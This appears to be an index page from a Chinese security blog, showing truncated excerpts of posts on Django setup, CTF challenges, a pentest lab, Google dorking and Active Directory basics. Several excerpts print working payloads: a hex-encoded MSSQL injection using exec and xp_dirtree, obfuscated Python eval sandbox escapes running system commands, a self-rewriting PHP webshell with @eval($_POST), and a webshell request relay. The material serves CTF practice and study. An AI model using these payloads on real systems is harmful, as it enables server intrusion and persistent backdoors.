anz

online_crtapp.py 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293import datetimeimport jsonimport osimport socketimport uuidfrom cryptography import x509from cryptography.hazmat.backends import default_backendfrom cryptography.hazmat.primitives import hashes, serializationfrom cryptography.hazmat.primitives.asymmetric import rsafrom cryptography.x509.oid import NameOID ...

环境配置安装,创建django项目 默认文件1234567 __init__.py asgi.py 接受网络请求,异步请求,无需改动 settings.py 项目配置文件 urls.py 路由设置文件 wsgi.py 接受网络信息文件,头部请求,无需改动templates manage.py 核心文件,负责项目管理,启动,创建app,数据库管理 app创建app负责实现项目功能点 在终端输入 1python manage.py startapp app01 123456apps.py 无需改动tests.py 单元测试,无需改动migrations/__init__.py 数据库字段变更,无需改动admin.py 后台模块,无需改动views.py 重要内容,与函数有关models.py 重要内容,数据库操作 启用django创建完毕app还需要在settings.py进行注册 然后编写url和视图函数对应关系,在urls.py views.py中 启动程序,成功访问 模板与静态文件返回字符串可以直接使用httpresponse,但如果想要返回一个htm ...

ezsql过滤了空格,可以使用空白字符绕过 /**/ %0a %01 %02 %0E %0f + 这里%0a,+和/**/都不可以,而且只有隐式转化才会出现报错,还过滤了$ % & * ' " < > '和"被过滤,但是;可以用,用十六进制编码绕过 1id=1;declare%02@s%02varchar(2000)%02set%02@s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29%02exec(@s) 插入文件数据123456789101112//创建表格CREATE TABLE tmp (dir varchar(8000),num int,num1 int);//列目录insert into tmp(dir,num,num1) execute master..xp_dirtree '/',1,1insert into tmp(dir,num,num1) exec xp_dirtree '/',1,1 ...

123exp = '__import__("os").system("id")'print(f"eval(bytes([[j][0]for(i)in[range({len(exp)})][0]for(j)in[range(256)][0]if["+"]]or[".join([f"i]in[[{i}]]and[j]in[[{ord(j)}" for i, j in enumerate(exp)]) + "]]]))") 如果if过滤 1CMD = [eval][eval(list(dict(b_o_o_l=1))[0][::2])(eval(list(dict(e_x_e_c=1))[0][::2])(eval(list(dict(b_y_t_e_s=1))[0][::2])([eval(list(dict(o_r_d=1))[0][::2])(j)for(i)in(list(eval( ...

环境配置首先把我们的NAT模式改成靶场的网段 然后配置一下 web靶机,这个需要先还原V1.3快照才能用默认密码登录 之后进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin 管理员:Administrator/1qaz@WSX 以管理员身份开启weblogic服务 1netstat -ano | findstr 7001 开启PC,输入用户名密码让360自启动 外网打点搜集ip信息 12345678910111213┌──(root㉿kali)-[/home/kali]└─# arp-scan -lInterface: eth0, type: EN10MB, MAC: 00:0c:29:b6:a8:7e, IPv4: 192.168.111.145Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)192.168.111.1 00:50:56:c0:00:08 VMware, Inc.192. ...

web670-web676写一个.shell.php 因为rm -rf *不会删掉开头为.的文件 写入内存马,就算删掉了文件内存马还存在 1234567891011<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.shell.php'; $code = '<?php @eval($_POST[1]);?>'; while (1) { file_put_contents($file, $code); usleep(5000); }?> web677-web678会删掉所有文件但是不会杀掉进程,那就留一个进程延时读取/f*文件 1cmd=system('sleep 9;cat /f*'); web679这里check之后直接404了,但是依然没有杀掉进程 先到/tmp写个index.php,然后在&# ...

docekr配置docker换源 123456789#输入命令，创建daemon.json文件vim /etc/docker/daemon.json#在编辑器中输入内容，并保存退出{ "registry-mirrors": ["https://nddt8zfh.mirror.aliyuncs.com"]}#输入命令，重启docker即可systemctl daemon-reloadsystemctl restart docker docker环境调试 1234567version: '2'services:weblogic:image: vulhub/weblogicports:- "7001:7001"#映射的端口docekr- "8453:8453" 继续 1234apt-get updateapt-get install vim使用docker exec -it e0 /bin/bash命令进入容器，对root/Oracle/Middleware/user_ ...

请求转化由于蚁剑菜刀均是利用POST进行命令执行 只要把POST改为GET请求即可 如下脚本 1234567891011121314151617181920<?phphighlight_file(__FILE__);ini_set('max_execution_time', '100'); // 超时时间$url = 'http://localhost/test/rce.php'; // 一句话地址$pass = '2'; // 密码$data = $_POST['cmd']; // 中转密码echo file_get_contents($url.'?'.$pass.'='.$data);if(isset($_GET['upload'])){ $f = fopen('darkshell.php','r'); // 上传文件 while (!feof($f))&# ...

Google Hack1.intext: 关键字、allintext：关键字把网页正文中某个关键字做为搜索条件，然后搜索全世界网页正文中含有这些关键字的网页eg： 搜索网页登陆口，intext：验证码 4800 2.intitle：关键字、allintitle： 关键字把网页标题中某个关键字做为搜索条件，然后搜索全世界网页标题中含有这些关键字的网页eg: intitle:后台登陆 3.cache：关键字搜索含有关键字内容的cacheeg：cache：pku.edu.cn #搜索北京大学服务器中的缓存 4.define：关键字搜索关键字的定义。eg：define:html查找Html的定义 5.filetype：文件名.后缀名搜索特定的文件eg: 搜索信息安全类的论文 “信息安全论文” fiile:doc 6.info：关键字这个语法用于搜索指定站点的一些基本信息eg: info:pku.edu.cn 搜索北京大学网站的一些基本信息 7.inurl：关键字、还可以使用allinurl来精确的定位URL地址搜索含有关键字的URL地址 8.link：关键字。查找与关键字做个链接的URL链接， ...

域(Domain)网络中多台计算机通过逻辑的方式组织到一起进行集中管理,这种集中管理的环境称为域 域控制器(Domain Controller DC)每个域中至少有一台域服务器,集中存放整个域的用户帐号和安全数据库,安装了活动目录(AD)的主机称为域控制器,所有的权限身份验证都在域控制器上进行 域环境​ 单域:一般至少两台域服务器,一台作为DC,一台作为备份DC ​ 父域和子域:出于管理需求,需要在网络中划分多个域,第一个域称为父域,各分部的域称为子域,不同的域之间,信息交互的条目会大大减少,且可以压缩后进行交互,节约带宽,并且域管可以针对各个域,设置不同的安全策略,灵活管理 ​ 域树: 域管理器只能管理本域,如果需要管理其他域,则需要建立信任关系,域树则是指多个域通过建立信任关系组成的集合,同理,多个域树通过建立信任关系组成的集合则称为域林 ​ 域名服务器(DNS): 用于实现域名和与之对应的IP地址之间相互转换,因为域中的计算机是使用DNS来定位域控和其他服务器的,所以域的名字就是DNS域的名字(DNS和DC一般在同一台机器上) 活动目录(Active Directory,AD) ...